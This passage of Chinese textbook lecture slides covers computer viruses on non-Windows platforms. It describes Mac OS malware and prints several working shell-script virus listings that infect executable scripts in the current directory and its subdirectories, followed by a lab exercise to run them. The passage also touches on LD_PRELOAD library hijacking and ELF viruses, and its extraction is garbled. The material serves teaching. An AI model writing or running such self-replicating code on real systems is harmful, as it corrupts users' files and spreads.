计算机病毒原理及防范技术 王路群 第9章 其他平台的病毒新

Virus计算机病毒原理及理论 第九章 其他平台的病毒 2018/8/9 1第九章 其他平台的病毒9.3 Shell脚本及病毒9.2 Mac OS环境下的病毒9.1 其他平台病毒的概述本章学习导读9.4 伪造的库函数9.5 基于 ELF的计算机病毒9.6 移动设备病毒本章小结2本章学习导读本章主要讲解除了 windows操作系统以外的其他平台下的病毒。首先概要的介绍其他平台下的病毒；然后讲解 Mac平台下的病毒的特点； Linux以及 Unix平台下的 Shell病毒；然后介绍伪造的库函数；最后介绍新型移动设备上面的主要病毒。39.1 其他平台病毒的概述 v实际上没有一个 OS可以完全抵御病毒的，包括 Linux。不论在 Linux平台，还是Windows NT或者 Mac OS，或者 DOS或Windows，或者是 Amiga，都可以创造出病毒代码。 49.1 其他平台病毒的概述v1.一些公共误区 首先第一个最大的误区就是很多高性能的安全系统可以对病毒蔓延的预防。 另一个误区就是认为 linux系统尤其可以防止病毒的感染。第三个误区就是认为 UNIX系统是绝对安全的。59.1 其他平台病毒的概述v2. Shell脚本 v传播得首要问题是想办法使各个平台兼容。所以首先想到的是： shell脚本语言。vshell在不同的 UNIX系统上面的差别很小。 69.1 其他平台病毒的概述v3.蠕虫vInternet的蠕虫病毒一般都是利用已知的攻击程序去获得目标机的管理员权限，但是蠕虫的生命也是很短暂的，当该病毒所利用的漏洞被修补的话，那么该蠕虫也就失去它的作用了， 79.1 其他平台病毒的概述v4.内核级的传播 vrootkit技术被病毒广泛应用，新型的病毒通过修改操作系统内核，来隐藏自身进程，隐藏自身文件，隐藏注册表项，此时的病毒完全融入了系统内核，无从发现也无从查杀。89.1 其他平台病毒的概述v5.与平台兼容的病毒 v如果用标准 C来书写病毒代码的话，各种不同体系的 UNIX系统变化不大。只需要对方计算机有一个gcc编译器，这样的病毒可以很轻易的扩散。这种可以跨平台的病毒的传染面是非常广的，而且似乎根本没有结束的时候。99.2 Mac OS环境下的病毒v1. Mac.Simpsons mm v一个感染 Macintosh（ Mac OS 9.0 或更高）平台的 AppleScript蠕虫，该蠕虫会打开Outlook（ 5.02）或 Entourage并向地址簿中的所有人发送自身的副本。 109.2 Mac OS环境下的病毒v2. SevenDustv该病毒专门感染 Mac执行文件，作为一个感染后的特征，该病毒还会在系统的 Extension文件夹内生成一个名为 “？ 666”的古怪文件。感染了这种病毒的机器最终将无法完成启动，并出现报警框，提示发生 127类系统错误。该病毒只会感染Mac OS 8/9，不会感染 Mac OS X（但会感染Classic）。 119.2 Mac OS环境下的病毒v3. CODE 9811 v此病毒在应用程序之间传播。当受感染的应用程序启动时，它会搜索并感染另一个应用程序，将自身复制到该应用程序中。 129.2 Mac OS环境下的病毒v4. MBDF A vMBDF A是源于特洛伊木马病毒 Tetracycle的变种。另外，有人发现 MBDF A携带于 Obnoxious Tetris和 Ten Tile Puzzle几个版本中。 139.2 Mac OS环境下的病毒v5. MAC_RENEPO.B v 它会执行下列动作：v （ 1）安装一个会自动激活的例程。v （ 2）执行一个远程访问应用程序（ OSXvnc）。v （ 3）记录使用者通过键盘输入的资料。v （ 4）下载并执行一个密码破解程序。v （ 5）窃取密码、密码杂凑、以及系统或使用者组态信息。v （ 6）修改系统或其它应用程序设定或偏好选项。 149.2 Mac OS环境下的病毒v6. MAC_MP3CONCEPT.A v这个概念验证型恶意程序似乎是一个有效的 MP3文件，但实际上它是一个内含 MP3文件的Macintosh执行程序。 159.2 Mac OS环境下的病毒v7. MAC SIMPSON.A 与 MAC SIMPSON.B v他们会通过 Microsoft Entourage或Microsoft Outlook Express来散播。一旦感染系统之后，它们会开启一个网页，并将它们新增到激活项目中。 169.2 Mac OS环境下的病毒v8. MAC_AUTOSTART.A v它会感染每一个挂载的磁盘驱动器，在磁盘驱动器的根目录植入一个名为 DB的自动执行文件。它还会将自己植入 Extensions资料夹成为DESKTOP PRINT SPOOLER，以便在每次系统激活时都能执行。 179.3 Shell脚本及病毒 v操作系统与外部最主要的接口就叫做 Shell。Shell是操作系统最外面的一层。 Shell管理用户与操作系统之间的交互：等待用户输入，向操作系统解释用户的输入，并且处理各种各样的操作系统的输出结果。 Shell提供了用户与操作系统之间通讯的方式。 189.3 Shell脚本及病毒v1.最原始的 Shell病毒v#shellvirus I#vfor file in ./infect/*vdovcp $0 $filevdone199.3 Shell脚本及病毒v2. Shell病毒举例v #shellvirus II#v for file in ./infect/*v dov if test -f $file #判断是否为文件v thenv if test -x $file #判断是否可执行v thenv if test -w $file #判断是否有写权限v thenv if grep -s echo $file .mmm #判断是否为脚本文件v thenv cp $0 $file #覆盖当前文件v fiv fiv fiv fiv donev rm .mmm -f209.3 Shell脚本及病毒v3.具有感染机制的 Shell病毒 vShell脚本一般都是明文的，不过危害性已经相当大了。感染标志 infection来判断是否已经被感染在程序中可以反应出来。为了使上面的代码不容易被发现，必须优化它，最先考虑的肯定是精炼代码。219.3 Shell脚本及病毒v #shellvirus III#v #infectionv head -n 35 $0 .test1 #取病毒自身代码并保存到 .testv for file in ./* #遍历当前目录中的文件v dov echo $filev head -n 1 $file .mm #提取要感染的脚本文件的第一行v if grep infection .mm .mmm #判断是否有感染标记 infectionv then #已经被感染 ,则跳过v echo “infected file and rm .mm“v rm -f .mmv else #尚未感染，继续执行v if test -f $filev thenv echo “test -f“v if test -x $filev thenv echo “test -x“v if test -w $filev thenv echo “test -w“v if grep -s echo $file .mmmv thenv echo “test -s and cat.“v cat $file .SAVEE #把病毒代码放在脚本文件的开始部分v cat .test1 $file #原有代码追加在末尾v cat .SAVEE $file #形成含有病毒代码的脚本文件v fiv fiv fiv fiv fiv donev rm .test1 .SAVEE .mmm .mm f #清理工作229.3 Shell脚本及病毒v4.精炼 Shell代码 v #ShellVirus IV#v #infectionv for file in ./* ; do #分号（ ;）表示命令分隔符v if test -f $file thenv if grep -s echo $file /dev/nul ; thenv head -n 1 $file .mmv if grep -s infection .mm /dev/nul ; thenv rm -f .mm ; elsev head -n 14 $0 .SAVEEv cat $file .SAVEE v cat .SAVEE $filev fi fi fiv donev rm -f .SAVEE .mm 239.3 Shell脚本及病毒v5.感染特定目录得 Shell病毒vShell病毒可以做很多事情如 download后门程序、为机器 自动 开后门、主动去攻击联网的其他机器、利用用户的 email来发送传染等等。 249.3 Shell脚本及病毒v #ShellVirus V#v #infectionv xtemp=$pwd #保存当前路径v head -n 22 $0 /.test1v for dir in ./* ; do #遍历当前目录v if test -d $dir ; then #如果有子目录则进入v cd $dirv for file in ./* ; do #遍历该目录文件v if test -f $file thenv if grep -s echo $file /dev/nul ; thenv head -n 1 $file .mmv if grep -s infection .mm /dev/nul ; thenv rm -f .mm ; elsev cat $file /.SAVEE #完成感染v cat /.test1 $filev cat /.SAVEE $filev fi fi fiv donev cd v fiv donev cd $xtempv rm -f /.test1 /.SAVEE .mm #清理工作 259.3 Shell脚本及病毒v6.脚本病毒实验 v 解压缩目录 ExperimentLinuxScript。该目录下共包含 v-l.sh， v 2.sh， v 3.sh， v 4.sh和 v S.sh等5个 Linux系统下的脚本病毒文件。复制这些文件到Linux系统。v1）修改这些病毒为可执行文件。v2）创建测试用脚本文件（例如， test.sh），根据病毒感染能力，注意测试文件的属性、所在目录层次等。v3）依次执行这 5个脚本病毒，查看它们的执行效果。 269.4 伪造的库函数 v人们可以利用 LD_PRELOAD环境变量插入代码，也可以利用 LD_PRELOAD环境变量把标准的库函数替换成自己的程序，从而让宿主程序执行自己的代码。因此，这种方式可称为伪造的库函数。279.5 基于 ELF的计算机病毒9.5.3 Linux平台下的病毒9.5.2 五种感染方式9.5.1 代码段和数据段289.5 基于 ELF的计算机病毒 v在 UNIX和 Linux上的病毒通常会使用 ELF可执行文件格